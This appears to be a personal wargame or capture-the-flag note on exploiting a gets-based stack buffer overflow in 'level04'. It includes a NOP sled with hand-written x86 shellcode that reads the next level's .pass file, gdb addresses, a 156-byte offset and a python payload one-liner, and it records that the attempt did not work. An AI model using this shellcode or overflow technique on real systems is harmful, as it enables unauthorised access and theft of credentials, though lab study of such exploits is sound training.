the executable prevents itself from calling execve

we write a shellcode that reads "../level05/.pass", and writes it in "a"

export A=`echo -e -n \
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
"\xeb\x3c\x5b\xb0\x05\xcd\x80\x89"\
"\xc6\x89\x14\x24\xc6\x04\x24\x61"\
"\x89\xe3\xb0\x05\xb1\x41\x66\xba"\
"\xff\x01\xcd\x80\x89\xc7\x31\xd2"\
"\x89\xf3\xb0\x03\x83\xec\x28\x8d"\
"\x0c\x24\xb2\x28\xcd\x80\xb0\x04"\
"\x89\xfb\xb2\x28\xcd\x80\x31\xc0"\
"\xb0\x01\x31\xdb\xcd\x80\xe8\xbf"\
"\xff\xff\xff/home/users/level05/.pass"`

the inner program uses gets, which is inherently unsafe
the buffer is 32 bytes long

the return address sits at 0xffffd5bc (0xf7e45513)
the array address is 0xffffd520
the offset is 156

gdb tells us the address of our env var is
x/s *((char **)environ+1) => 0xffffd7cd

we use 0xffffd7d4 to get the shellcode addr

python -c 'print "A" * 156 + "\xff\xff\xd7\xcd"[::-1]' | ./level04

it doesn't work

no info on why, but we know our shellcode probably doesn't segfault

possible error, by likelyhood:
	perm bullshit
		-> can't open a
		-> can't open pass
		-> can't create file with such free permissions
	difference in execution on different machines
		-> different codes ?
	corruption in env var conversion


